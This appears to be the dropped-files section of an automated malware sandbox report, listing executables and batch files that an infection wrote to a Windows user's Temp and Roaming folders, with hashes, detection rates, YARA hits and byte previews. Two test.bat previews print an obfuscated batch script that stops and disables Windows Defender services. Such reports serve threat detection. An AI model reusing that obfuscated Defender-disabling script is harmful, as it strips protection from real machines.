                                                            SHA1:6FCA27B1A571B73563C8424C84F4F64F3CBCBE2F
                                                            SHA-256:E88E04654826CE00CC7A840745254164DDBD175066D6E4EA6858BF0FE463EBB4
                                                            SHA-512:C9A74FA4154FA5E5951B0EEAC5330CA4BAC981FF9AD24C08575A76AD5D99CFB68556B9857C9C8209A1BFCB43F82E00F14962987A18A92A715F45AD0D4E4A718C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                            C:\Users\user\AppData\Local\Temp\1105.tmp
                                                            Process:C:\Users\user\AppData\Local\Temp\8615.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1622408
                                                            Entropy (8bit):6.298350783524153
                                                            Encrypted:false
                                                            SSDEEP:24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
                                                            MD5:BFA689ECA05147AFD466359DD4A144A3
                                                            SHA1:B3474BE2B836567420F8DC96512AA303F31C8AFC
                                                            SHA-256:B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
                                                            SHA-512:8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...s<s............!.....,...................P....(K......................................@A.............................&..............8............h...Y.......N..`l..T............................................................................text....).......*.................. ..`RT...........@...................... ..`.data...dW...P.......0..............@....mrdata.h#.......$...>..............@....00cfg...............b..............@..@.rsrc...8............d..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe
                                                            Process:C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):91000
                                                            Entropy (8bit):6.241345766746317
                                                            Encrypted:false
                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat
                                                            Process:C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8399
                                                            Entropy (8bit):4.665734428420432
                                                            Encrypted:false
                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                            C:\Users\user\AppData\Local\Temp\152F.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):600064
                                                            Entropy (8bit):7.0823050688713245
                                                            Encrypted:false
                                                            SSDEEP:12288:d4iSiev79SzT1pDrtSmIuz0ct8XZH3h5VZZJD0OSWDkYW8:iD9SzT1pMmF9tKlhh/JD
                                                            MD5:0EFD1C9D005446AEF5FEE4EB512F5887
                                                            SHA1:4C816AABAF80D2ABB5CF3587F1C8ED77AD008569
                                                            SHA-256:7EB03078F08F097B0EEBC611AC1B3F6F443FAC5ABDFB8879175193AEDF24D37B
                                                            SHA-512:F36137716B7F9B3AEAC6645606849CF4BF655561CD9968E45AB798179DD18407C8D51EAF134BEFB0DC10103E7EE24B251F1BDA5737EB776EC352C9D5A375E427
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...]o.`......................p...................@...........................x......T..........................................P....@w..?....................w.8...0...................................@............................................text...P........................... ..`.data....io.........................@....rulofiv.....0w.....................@....rsrc....?...@w..@..................@..@.reloc..."....w..$..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\2E26.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:MS-DOS executable, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1945824
                                                            Entropy (8bit):7.918437719630121
                                                            Encrypted:false
                                                            SSDEEP:24576:v6eaePe+SojytbN06B79lysLw8V4lITJraFkmyzH8NTrF6M0hSrkwOLP/qkAAIZS:v6eaG3jW0g9lxE8VuCcRXOLXqkAAD
                                                            MD5:2880915476E56A16314B067128663950
                                                            SHA1:C212EB6B26C5BE7AB70892A135F74598A4818EE6
                                                            SHA-256:C285405EE5667D20622A07D48C1A7AB5BF01F5C70F76ED94B19034DC3E6CB203
                                                            SHA-512:242701E04FD365AA2DC6B761A287936471D64A5259299A6196DE8548232D7033FE3373A294802B049FD942CEAE942C2F9AD2F547822655F7098481788A44D1FD
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: MZ@.....................................!..L.!Win32 .EXE...$@...PE..L.....ea..............................?...........@...........................C.....^.....@...................................?.......?..5............................................................................?.h............................MPRESS1..?......P.......................MPRESS2......?......R...................rsrc....5....?..6...b..............@..............................................................................v2.19...N.. .....i..k..r..a.......j......rt.'...,.?s...b\.@...( 5..O.[.......8P.P...D].K%9.i..XWK.9....0..CH..E,x..h...b.....'>K.M;....V[...3u. .D.6..jR...Gnt.[}i..NV.;...k..o...=...IK.-,M..6.F..v...H.)\.u...LP.9.S....b.r.{.&.M+'...TN&..,`S.....%.%s..@5.L..aL.Li"..JI..P;.jq.........CN..`.........*.......$.s..7B...(..{.......?@:..@.t..U..c.z<....6..?.....u...+S64.\..dTs....O.95..[* ......r........)*G(.)6.v.P.........w.&)$P........%%q.....|.7.....=....!.......l.
                                                            C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                            Process:C:\Users\user\AppData\Local\Temp\977B.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):859648
                                                            Entropy (8bit):2.9241367623104355
                                                            Encrypted:false
                                                            SSDEEP:6144:pkY0668MzX0oJgx6nrBdkBSrBHHHI6t7af9GH0WbcSDkTDhm6Xpic76vneCVvK36:phHmzXaNIWsUwgrNt1E/Z
                                                            MD5:AB823DF932B3C2941A9015848EBDB97B
                                                            SHA1:A7E2D46ADA3A42A3D32A96937C316340F2E62A5B
                                                            SHA-256:812D78A50A8DE210DBBCE12FDA210461770B8B928F8B3249DE80ECB68055F61E
                                                            SHA-512:59AC83CED7E0A68E7491812B494E715FC19BA2AA25EDBC0B5765792A1DC19432DBF8F5B671EA4EEBF590740C63EE1A50FE4B0FC716B986F6C5070B920F5C2325
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.|a.........."...0..............1... ........@.. ....................................`..................................1..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H............D......Q...................................................V#... ..A#... ..A&&*...0.......... QB.o.......(....&*..0.......... .n.m.......(....&*..0..J.........(....+.~.....(....,.........+..+..*......(....(.........(....(.........*...0..........(....(.....% t..(...+.....% .g..(...+.....% ..0.(...+...... H.NB(...+.....% .z..(...+.....% [/}h(...+.....% ....(...+.....% M.3(...+.....% ....(...+.....% ....(...+.....% _.C.(...+.....% ..&d(...+..... ...}(...++". ...
                                                            C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):512512
                                                            Entropy (8bit):7.846723941917503
                                                            Encrypted:false
                                                            SSDEEP:12288:Tw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+LF:TVhdLVg2Zep7njXzPDxC+J
                                                            MD5:F57B28AEC65D4691202B9524F84CC54A
                                                            SHA1:F546B20EB40E3BC2B6929BA0F574E32422CED30C
                                                            SHA-256:87D86132095541ED3B5FE05EB06692E1712287B6FFD9832A28EB85F52B55F0A5
                                                            SHA-512:1A773186B0A15F743F8D9681036A9ECA45E2DD5F7944725498E929C5438ACFFCD753061EB475383E5759FC41A8ADE4EB717F3D3529313C3C0D48C659B5E36F09
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\66A4.exe, Author: Florian Roth
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. .......................@............`.....................................S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........u...p..........HZ..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                            C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):512952
                                                            Entropy (8bit):7.861107666291364
                                                            Encrypted:false
                                                            SSDEEP:12288:2w86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+w:2VhdLVg2Zep7njXzPDxC+w
                                                            MD5:42758E2569239A774BECDB12698B124C
                                                            SHA1:4AB353C4177A69FC9A6F3844852762809591DD2F
                                                            SHA-256:E3380DFDD6297AC134BB22C7C1603782F198A5B2164855BF66A95BAE47AB472D
                                                            SHA-512:959A6D4E39BC949F8C92C4213A7DD424EFF46AACCBCE6553D42863F4341B934CEB14997F67FDC2013D064A09C6134B9A113438347B7DEDF65E3A7E2ADA5DEF18
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\77DC.exe, Author: Florian Roth
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................... ............`.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........t...^..........HY..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                            C:\Users\user\AppData\Local\Temp\8615.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):212992
                                                            Entropy (8bit):6.734269361613487
                                                            Encrypted:false
                                                            SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                            MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                            SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                            SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                            SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 80%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\977B.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):859648
                                                            Entropy (8bit):2.9241367623104355
                                                            Encrypted:false
                                                            SSDEEP:6144:pkY0668MzX0oJgx6nrBdkBSrBHHHI6t7af9GH0WbcSDkTDhm6Xpic76vneCVvK36:phHmzXaNIWsUwgrNt1E/Z
                                                            MD5:AB823DF932B3C2941A9015848EBDB97B
                                                            SHA1:A7E2D46ADA3A42A3D32A96937C316340F2E62A5B
                                                            SHA-256:812D78A50A8DE210DBBCE12FDA210461770B8B928F8B3249DE80ECB68055F61E
                                                            SHA-512:59AC83CED7E0A68E7491812B494E715FC19BA2AA25EDBC0B5765792A1DC19432DBF8F5B671EA4EEBF590740C63EE1A50FE4B0FC716B986F6C5070B920F5C2325
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.|a.........."...0..............1... ........@.. ....................................`..................................1..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H............D......Q...................................................V#... ..A#... ..A&&*...0.......... QB.o.......(....&*..0.......... .n.m.......(....&*..0..J.........(....+.~.....(....,.........+..+..*......(....(.........(....(.........*...0..........(....(.....% t..(...+.....% .g..(...+.....% ..0.(...+...... H.NB(...+.....% .z..(...+.....% [/}h(...+.....% ....(...+.....% M.3(...+.....% ....(...+.....% ....(...+.....% _.C.(...+.....% ..&d(...+..... ...}(...++". ...
                                                            C:\Users\user\AppData\Local\Temp\A557.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:modified
                                                            Size (bytes):161280
                                                            Entropy (8bit):5.163359140538006
                                                            Encrypted:false
                                                            SSDEEP:3072:hj1+ax5s9jVultxyIAMzTjSMzTjoIe1UhCp:hJqjVoeN
                                                            MD5:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                            SHA1:6E1ACD6CB17AB64AC6DBF0F4400C649371B0E3BD
                                                            SHA-256:08D67F957EC38E92301EEAAAF2759EF2A070376239EAD25864C88F3DD31EAB8C
                                                            SHA-512:14A1CD1090A2ECCEA3B654EEE2B7D4DE390219F8C3C200D97D2AB431311BDF24B1B40F2F38E78804AD286654CD33DFB515704C9B863DAF0786A0D633F05C9BF2
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\A557.exe, Author: Florian Roth
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 43%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P..l.............. ........@.. ...................................@.....................................O....................x............................................................... ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......(u..t.......A...HL...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                            C:\Users\user\AppData\Local\Temp\B084.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):347136
                                                            Entropy (8bit):5.994706914620217
                                                            Encrypted:false
                                                            SSDEEP:6144:5rT+Wp+Ouiv24iPmSCyf11rcrKElOoL91iH+2k9Q9:5H/p+Ouiv24gf11rcrKElOSiH
                                                            MD5:31BE6099D31BDBF1ED339EFFDC1C7064
                                                            SHA1:6B1077BE6CF57EA98C3BE8B6F0268D025EA72D88
                                                            SHA-256:9D9056D76BE4BEB3CC17CD95C47108AB42D73255F2BC031423D044ED927FB885
                                                            SHA-512:ECC057643C2E65C74F3286C8856EB57FEC75FCB650FBE864D53EC0C36C34E0DA3242E19657B1ABB75AA3EEE88A7367E77FFC0E3FE98BFEF0D180C74966D1CEDE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L...g.._......................p.....p.............@...........................t.................................................P....`s.h?....................s.....0..................................@............................................text... ........................... ..`.data....io.........................@....daya........Ps.....................@....rsrc...h?...`s..@..................@..@.reloc...#....s..$...(..............@..B........................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\C5EA.exe
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):344064
                                                            Entropy (8bit):5.99188338211275
                                                            Encrypted:false
                                                            SSDEEP:6144:O0kWD+3Pz81AwPC4BVZ2LGuSoGZkk4mAzaV/:JZD+/CO4ULGuShkk4m1V/
                                                            MD5:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                            SHA1:552AA072522F22A003CADD3BCAD5E4EB981A5CBB
                                                            SHA-256:8245AD87EEA6A1F19F658ADEF8A30B9A512760D866B7075BBF205D7A54296234
                                                            SHA-512:AE62F33E3B0DAE89BBD33481B50E6BA53F31AD8699D1570C8B03D73C2045E870CBA25A06CC3DCEA07D784CA688F63C2C335BD262B0722B4461D29AB54357C226
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...6.`......................p.....@.............@...........................t.....1...........................................P....Ps..?....................s.<...0...................................@............................................text.............................. ..`.data....io.........................@....lufulac.....@s.....................@....rsrc....?...Ps..@..................@..@.reloc..."....s..$..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe
                                                            Process:C:\Users\user\AppData\Local\Temp\A557.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):91000
                                                            Entropy (8bit):6.241345766746317
                                                            Encrypted:false
                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat
                                                            Process:C:\Users\user\AppData\Local\Temp\A557.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8399
                                                            Entropy (8bit):4.665734428420432
                                                            Encrypted:false
                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                            C:\Users\user\AppData\Roaming\bejhieg
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):212992
                                                            Entropy (8bit):6.734269361613487
                                                            Encrypted:false
                                                            SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                            MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                            SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                            SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                            SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Roaming\jejhieg
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):345088
                                                            Entropy (8bit):6.005613916547972
                                                            Encrypted:false
                                                            SSDEEP:6144:Y5uWaxsOBlJyeq8PStBStFgykET6+lWx:QvRO8R8PStBS4ykETW
                                                            MD5:5AE3B69C31FE729AC672BA483280F16D
                                                            SHA1:310D993F9FBE7FB9CF3892220D980E08EB5E6286
                                                            SHA-256:033247A6BA1CD0543F27857FB6743E16FDD2990CEA1DF3DCE93E4031C8046D1A
